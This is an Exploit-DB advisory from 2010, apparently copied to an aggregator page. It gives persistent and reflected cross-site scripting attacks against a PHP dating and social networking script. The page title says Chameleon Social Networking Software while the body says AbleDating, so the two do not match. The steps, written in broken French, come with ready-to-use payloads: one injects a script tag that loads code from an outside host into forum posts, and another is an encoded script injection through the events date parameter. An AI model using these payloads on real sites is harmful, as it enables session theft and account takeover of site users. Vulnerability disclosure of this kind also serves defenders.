Chameleon Social Networking Software – Persistent Cross-Site Scripting

• Exploit Database
• 13 阅读

• 作者： Dr-mosta
  日期： 2010-11-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15543/

• # Exploit Title: AbleDating script 2010 Critical XSS Vulnerability 
  # Date: 15.11.2010 
  # Author: Dr-mosta 
  # Category: webapps/0day 
  # Script url: http://www.abk-soft.com/matchmaking_software_demo.html 
  # Version: N/A 
  # Tested on: 
  # CVE : 
  
  [ EXPL0!T ] 
  
  IL vaut faut inscrire au site apres aller a la partie forum ou par le 
  lien: www.sitevictim.com/forum.php
  aper essais de choisir un category et essais de cree un Sujet dans le forum
  vous pouvez ajouté votre code xss das le titre de Posterou Description ou Message
  
  Exemple exploit code :
  
  “><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><”
  
  Exploit 2:
  
  IL vaut faut inscrire au site apres l'Exploit :
  (vuln): server/events_event_edit.php?events_event_edit.php?event_private=1&date=[XSS]
   
  Exemple exploit code :
  
  server/events_event_edit.php?event_private=1&date=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E%20%3Cinput%20style=%22visibility:%20visible;%22%20class=%22inp_lblack%20no_abk%20hasDatepicker%22%20id=%22event_date%22%20autocomplete=%22off%22%20name=%22event_date%22%20value=%2212-15-2010
  
  Greetz = TeaM MostA , exploit-db.com 
  
  Good Luck .